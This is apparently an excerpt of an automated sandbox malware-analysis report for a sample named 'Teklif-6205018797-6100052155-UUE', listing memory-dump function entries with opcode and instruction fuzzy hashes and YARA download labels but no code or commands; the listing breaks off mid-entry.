                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 48fc48d3ac453a40fb20b63bc29789048eb38900d6b8263eb7d51502a6429127
                                                          • Instruction ID: 4817ede97124cb228592ec4d7abf19801cb4007496dbd2fc9d2bfedb79116118
                                                          • Opcode Fuzzy Hash: 48fc48d3ac453a40fb20b63bc29789048eb38900d6b8263eb7d51502a6429127
                                                          • Instruction Fuzzy Hash: D2119435B003049FCB24DF69D84A7AD7BF6FB88710F148425E919DB280DB74C9028B90
                                                          Function 00791697 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60f2447c5682bd7ae732719252c3184b0b2c969901419e2853bc22eb770daac5
                                                          • Instruction ID: 4569163d284601db5bdad722c9617a4ac33c49bd43cac9c941e16a75f594d30e
                                                          • Opcode Fuzzy Hash: 60f2447c5682bd7ae732719252c3184b0b2c969901419e2853bc22eb770daac5
                                                          • Instruction Fuzzy Hash: 8401D631A0C2969FCB459F7DD4614DD7FA1EF4735075880EAD042DF3A2DD288815C796
                                                          Function 0079BBE0 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cafa16aec42e7bfc8cb99d844ca0d36710c1f68e48c6335606bba6545652059
                                                          • Instruction ID: cf8463dd4550035387f1c91857a40479edc3620f8bb904e97be809228af8552b
                                                          • Opcode Fuzzy Hash: 9cafa16aec42e7bfc8cb99d844ca0d36710c1f68e48c6335606bba6545652059
                                                          • Instruction Fuzzy Hash: 76110470D04209DFCF08CF99E9446EEFBF6EB8A311F14942AD505B3210DB785A85DBA4
                                                          Function 0596D63E Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab7cbc3ebff6e6cbff1ee7e2b341dfc3d33257c42c945445c87395d5ef040030
                                                          • Instruction ID: 15f2806de5a40f168f55c408b32ea50d8be5399fdce5055e5562ee852d95996d
                                                          • Opcode Fuzzy Hash: ab7cbc3ebff6e6cbff1ee7e2b341dfc3d33257c42c945445c87395d5ef040030
                                                          • Instruction Fuzzy Hash: 3E21A5B4A05229CFEB64DF24DD44BADBBB2BB04305F4451E9D459A7291DB705EC4CF01
                                                          Function 05930D00 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d06d227c1a9f9d532d71e46a07e392fc17acff118e6085e19cc97e393a7dfbb
                                                          • Instruction ID: e2183ca42c064340536307ce096786abf3044c2f6ec2221b4151b9f76d4bdd93
                                                          • Opcode Fuzzy Hash: 6d06d227c1a9f9d532d71e46a07e392fc17acff118e6085e19cc97e393a7dfbb
                                                          • Instruction Fuzzy Hash: 57117335B003049FDB249F699819BAE7BF6BB88711F144429E915DB280EB75DD41CB90
                                                          Function 05930948 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b7618025fec4a8225a426dee421d046a11a251e760eab2eee0d141e03d6fed80
                                                          • Instruction ID: cf8546b50d8563df2374b650e5eb5176271e1f3b05987b79e5be926642613bc6
                                                          • Opcode Fuzzy Hash: b7618025fec4a8225a426dee421d046a11a251e760eab2eee0d141e03d6fed80
                                                          • Instruction Fuzzy Hash: 20016C36340215AFD7108F59DC85FAFB7A9FB99721F108066FA15DB390D671DC118790
                                                          Function 00790A00 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f730c30b0dbeab58e8eb1694d46e7101ab2d28bc1fedd35cd37fe1d8ae29b47e
                                                          • Instruction ID: d3f3d27ce19d384f981979d58475cb78557076a2c4b291a8534a21ae59334386
                                                          • Opcode Fuzzy Hash: f730c30b0dbeab58e8eb1694d46e7101ab2d28bc1fedd35cd37fe1d8ae29b47e
                                                          • Instruction Fuzzy Hash: DB016D70938315CFCF15DF64E2156AE7AB5EB49300F20C5AAC406BB2A1CB790E0197E5
                                                          Function 0593EFF8 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d64fc5ce3a60f2a5813cad02d99cdab3944f58bfab6d688037c51882d5bea63
                                                          • Instruction ID: 00fac8ac32358f206e59a91a936c9045e0fab1cafa5aa1de9bdccaeb31104a59
                                                          • Opcode Fuzzy Hash: 0d64fc5ce3a60f2a5813cad02d99cdab3944f58bfab6d688037c51882d5bea63
                                                          • Instruction Fuzzy Hash: AE019231740700DFD729AA78C859B3A77A7EFC9324F148968E5168B790CB79EC42CB91
                                                          Function 05C72983 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfc236f3230b8a6a07a872d174f77a399acc1ebea7a9a419bf7566bfa41d7488
                                                          • Instruction ID: 170e0091fda3ede8512076796451b45b8e2cd58d0b268407761682f76024ef60
                                                          • Opcode Fuzzy Hash: cfc236f3230b8a6a07a872d174f77a399acc1ebea7a9a419bf7566bfa41d7488
                                                          • Instruction Fuzzy Hash: F22153749402288FEBA5DF28C898E99BBF1EB49300F1086E9D40DA7351DF349E85CF14
                                                          Function 0585D9CB Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 75ce42deadc028191b276c1a48aa9ffcb7e45e413468a368d4c345201fa8bade
                                                          • Instruction ID: 3ce0723ddfe461c672457e69788097f2d66ce085ec3e1a325b9274bd4f5209ec
                                                          • Opcode Fuzzy Hash: 75ce42deadc028191b276c1a48aa9ffcb7e45e413468a368d4c345201fa8bade
                                                          • Instruction Fuzzy Hash: 57111670A051198FCB58DF28C854BAEB7F6FB49300F1491A9980EE7251CB305E84CF04
                                                          Function 0593CF00 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03c676e9c4f305237f9de1d67c0ff44306949c944a25e33908f60e8d3cb842f7
                                                          • Instruction ID: 97930e5f482128d3bfb14f32acf1bad57db7c28a097e5b652b027c19a26645cb
                                                          • Opcode Fuzzy Hash: 03c676e9c4f305237f9de1d67c0ff44306949c944a25e33908f60e8d3cb842f7
                                                          • Instruction Fuzzy Hash: 7B01BC393406109FC305AB28D819E6ABBA2EFC8710B108528E50A8B350CF79EC42CBD1
                                                          Function 05931768 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79eb33e29a8a5523b6a12105bbf8d40109e29f16d94de6e8154147260ba9d6be
                                                          • Instruction ID: 57881e027fd02e486672b7d29b5055149aaaae6dc66adb773ee51bb8e2da29ce
                                                          • Opcode Fuzzy Hash: 79eb33e29a8a5523b6a12105bbf8d40109e29f16d94de6e8154147260ba9d6be
                                                          • Instruction Fuzzy Hash: 8A015E78700216CFCB04CA75C881AAE77B6FB84648F044939DA069B261E738D806DA85
                                                          Function 05930920 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8980a49c78be250255e6d81e3fee167a9b366bc06e7abcfceb688fe9824d6bcf
                                                          • Instruction ID: e76f59a1b6849535c874a58d5bbdd14839fdeb078be133d134b5226fa9e6e66a
                                                          • Opcode Fuzzy Hash: 8980a49c78be250255e6d81e3fee167a9b366bc06e7abcfceb688fe9824d6bcf
                                                          • Instruction Fuzzy Hash: 5B0186363042819FD705CF6ADC95D8ABBB9FF9662471580AAF905CB322D635DC06C760
                                                          Function 0585DA16 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dab2c1c6fc352250987a7f8e19fbab5795695b07a9ac4fa3671b0cabc2dc4f2
                                                          • Instruction ID: 0013aab0d582861e8ae7bcc5e0ef336a01a5374d9d870579acb55be47b9856ca
                                                          • Opcode Fuzzy Hash: 8dab2c1c6fc352250987a7f8e19fbab5795695b07a9ac4fa3671b0cabc2dc4f2
                                                          • Instruction Fuzzy Hash: 68110670E461188FCB65EF69C850B9EBAF2FB89314F2094A9980AA7252DB305E40CF15
                                                          Function 0593F008 Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6180f187a2842321a9de999dc04ce87b5618dc93983877c8f4c393a1b514ab88
                                                          • Instruction ID: bac27e95e64a87ae89c04aee5cb8ecbf8b5a62cc59ffb42c7a4c55de8840267e
                                                          • Opcode Fuzzy Hash: 6180f187a2842321a9de999dc04ce87b5618dc93983877c8f4c393a1b514ab88
                                                          • Instruction Fuzzy Hash: 8B019E30700600DFD714AB24D459A3B77A7EFC9314F148A68E5564B7A4CBB5EC02CB90
                                                          Function 05961D40 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1991bd2c5f22d4f93ea68c4bf74c988944978e795e547a413bc43217985d764f
                                                          • Instruction ID: 74da334b1610cdd68c02014ff400b0127f1e01eb3dbb449bb9f6734ce6d25271
                                                          • Opcode Fuzzy Hash: 1991bd2c5f22d4f93ea68c4bf74c988944978e795e547a413bc43217985d764f
                                                          • Instruction Fuzzy Hash: 3C018C74E0910CAFCB50CFA9C8106BCFBF5EB49200F1482AAC818A3340D6359B06EF81
                                                          Function 059398D9 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5454284d2c6e0c4e73c608e095eb233281ca3310701bcc18b3531b21cdf43af4
                                                          • Instruction ID: 3b90395d78180ac19457f15a1c6a905047cc96fba021cee710585a6bb166e558
                                                          • Opcode Fuzzy Hash: 5454284d2c6e0c4e73c608e095eb233281ca3310701bcc18b3531b21cdf43af4
                                                          • Instruction Fuzzy Hash: 80F02B36700108ABC7145E19D885EAEB7AEEF94220F058126E929D7321FE74DD168B90
                                                          Function 0585D088 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb612cde58dccd6477e874d771f6a0ca7993c708af7e399e90407c04fd5b3362
                                                          • Instruction ID: 6ba0751daa50d580958f729c41c36cb111728cc87525ff224437f71fec4979b2
                                                          • Opcode Fuzzy Hash: eb612cde58dccd6477e874d771f6a0ca7993c708af7e399e90407c04fd5b3362
                                                          • Instruction Fuzzy Hash: 08F03C70A0A308DFCB55DF7898549ADBFB2EB4A321F5082DADC44D7252D2328E56DF42
                                                          Function 0585D89F Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b7894a05599c14f68ef6303e9bdbaf8231062ba5448c09ab062612009efb88a
                                                          • Instruction ID: 00544aa5c41f24f75f93812570da1355ea5efce1ca8924d7508dbd13eb8ee6c9
                                                          • Opcode Fuzzy Hash: 6b7894a05599c14f68ef6303e9bdbaf8231062ba5448c09ab062612009efb88a
                                                          • Instruction Fuzzy Hash: 3911F8749001288FDB94EF24D854BD9BBF2EB49304F2086E9940AA7345DB755EC5CF94
                                                          Function 0593CF10 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d06c08f60cef2786fe28e93eeabce041f6ca76d07bb97515bac57fd9830c5fe9
                                                          • Instruction ID: 08c129b2036cdc7b6d6765495f6f08a57833e54a70ec4ae5931d174827c0b03e
                                                          • Opcode Fuzzy Hash: d06c08f60cef2786fe28e93eeabce041f6ca76d07bb97515bac57fd9830c5fe9
                                                          • Instruction Fuzzy Hash: 78016939300610DFC708AB24D419D2ABBA2EFCCB11B108528E90A8B354CF75EC42CBE1
                                                          Function 05938B70 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ba8250a179e56be466aadc898689fe94cd11702cb98b342ef53e53630699b92
                                                          • Instruction ID: 91b685251700a6351ca18747de9ecf0638536f3bb4bcd2cbb349bbf206ec83c3
                                                          • Opcode Fuzzy Hash: 2ba8250a179e56be466aadc898689fe94cd11702cb98b342ef53e53630699b92
                                                          • Instruction Fuzzy Hash: 2AF0E57630A222C7DB20160E7C81B6E87AEF7C0664F94053AF944D7300D5158C0307D0
                                                          Function 05C8F958 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32729fe322804216425f23ebf90d26c140395b9d46b506539d2247b3e33bd861
                                                          • Instruction ID: 1c9314e14f4e1de71d507aecada6853259c1910c51bdba6755abea1b3fa8ab88
                                                          • Opcode Fuzzy Hash: 32729fe322804216425f23ebf90d26c140395b9d46b506539d2247b3e33bd861
                                                          • Instruction Fuzzy Hash: 5DF0E931B442116FE3149A5DA800B3BF7EAEBC9720F14482DD5459B350DB75AC4187D4
                                                          Function 05852490 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4080f24b9dae6013e73a1db8c89ab0401e670568ff705daacb3a0cf03d065b9
                                                          • Instruction ID: c1442ee61934c8b81a6bbf805b0f8a4b13c2345ecabbc00dbf3e115319d032b2
                                                          • Opcode Fuzzy Hash: b4080f24b9dae6013e73a1db8c89ab0401e670568ff705daacb3a0cf03d065b9
                                                          • Instruction Fuzzy Hash: 9FF0C2B4A08248AFCB42DFA8D8406ACBFF5EB09310F14C1DAEC58D7241D6358E02DF51
                                                          Function 0596B8A8 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 714883a79de5394a800f5098f95f49f8c3cc4058747bf3d154887c42343a3ae3
                                                          • Instruction ID: c026d6a526fcda31a31d884bfe62dbc174c35c0fb70786108bd40b694392fd1c
                                                          • Opcode Fuzzy Hash: 714883a79de5394a800f5098f95f49f8c3cc4058747bf3d154887c42343a3ae3
                                                          • Instruction Fuzzy Hash: 9A115D74A052698FDB64CF18D988BD8BBB2FB05304F1095E6E90AB6250DBB15AC8CF04
                                                          Function 0596C810 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1464ffaf85ef7141c31881d2beed74c108173c6b82c9b215502d3a7b5ac2acdb
                                                          • Instruction ID: e04f831b7bcb3889638ca050beaecba40353d1064448e661186f31cce4da9037
                                                          • Opcode Fuzzy Hash: 1464ffaf85ef7141c31881d2beed74c108173c6b82c9b215502d3a7b5ac2acdb
                                                          • Instruction Fuzzy Hash: DF014B3190465AABCF119FA9C8009EEBB71FF89310F04D619E99823252D732A566DF90
                                                          Function 0593CC88 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b424b257a1bc8eab22aa54a945fab566556da72119ee6471bbd2f1e67f9c93a4
                                                          • Instruction ID: 57184c7d6242487db9c0659d3caefa64c4673f7ae37a41bbe50b99bb4901b543
                                                          • Opcode Fuzzy Hash: b424b257a1bc8eab22aa54a945fab566556da72119ee6471bbd2f1e67f9c93a4
                                                          • Instruction Fuzzy Hash: 0DF0907A3402009FD705DF24C855F6AB7A6EFC8711F1488AAF94ACB7A1CA35DC42CB80
                                                          Function 05938BC0 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e18a9ab8c12e61d81527b718d4e4af11a10d8deb9f3efa7820db62a1f5bee3a
                                                          • Instruction ID: 349aa0f9dde1ed5315fc890b297e06541044b44ed526947bdac480813ebaa682
                                                          • Opcode Fuzzy Hash: 9e18a9ab8c12e61d81527b718d4e4af11a10d8deb9f3efa7820db62a1f5bee3a
                                                          • Instruction Fuzzy Hash: 9EF027A570F222CBDB2207281C9263D6AEAFBC6540F8404BEF482CB361D908CC438780
                                                          Function 00791708 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2880ef9197a4d683f9de52e9fd5579bd20f687db34dcba058e2460ab9a0860b4
                                                          • Instruction ID: 4d2084d151c2a22ce70131eecb465901496ce559971a6d0febda0b4102bb3917
                                                          • Opcode Fuzzy Hash: 2880ef9197a4d683f9de52e9fd5579bd20f687db34dcba058e2460ab9a0860b4
                                                          • Instruction Fuzzy Hash: 5A018170A0425A9FDB15CBB4D510BEE7BF26F49340F64446AC042BB2D1DB3A4D01DB61
                                                          Function 00790A9D Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c29357a31967aab49f4602af9a075c5fb7e7eee71c039088c8f6e3559adeb7e
                                                          • Instruction ID: 89f3d1aeb269a5ec80a016185b8002f49212c58e1d25bd12af8aff7e27102033
                                                          • Opcode Fuzzy Hash: 0c29357a31967aab49f4602af9a075c5fb7e7eee71c039088c8f6e3559adeb7e
                                                          • Instruction Fuzzy Hash: E7F0F970979319CFCF249AA4B2157BD76A1EB48300F30C46AC11366261CABD0E01A7D6
                                                          Function 05966C95 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3b174d1f871c3a232c131e10028f38bb3e4bdb041734b062d3036e879fd97e4
                                                          • Instruction ID: d39e7bb1c2a72fd4f04b5a2aa077591eb01cdc0fbf560191947e5e9a2b5acb55
                                                          • Opcode Fuzzy Hash: f3b174d1f871c3a232c131e10028f38bb3e4bdb041734b062d3036e879fd97e4
                                                          • Instruction Fuzzy Hash: 1201E274801229CFDB60DF28C994BEDBBF6FB05304F9480D9E148A7240DB744A88EF01
                                                          Function 0596DF01 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d3c0d30a55187983612f974d91c961ef8861022d5ee29f58af4c02245ec429d
                                                          • Instruction ID: 6770538988d481b158f900ee76587610ad3164f803cab57f758347ea9ea82c2e
                                                          • Opcode Fuzzy Hash: 4d3c0d30a55187983612f974d91c961ef8861022d5ee29f58af4c02245ec429d
                                                          • Instruction Fuzzy Hash: 44F05E7590420CEFCB05CF98DD41ADCBBB5EB49300F04C5A9E92953351C7329A66EF51
                                                          Function 0596C820 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 432c1dc090e2d0ad41fe8715333f3d8f702969acb1f3c38e32ed50b4f0f9e2ca
                                                          • Instruction ID: 82b2b3c177a3e7f37d64d52886328dbd9d9cad1ddc7bafebbd9ddedd531d227d
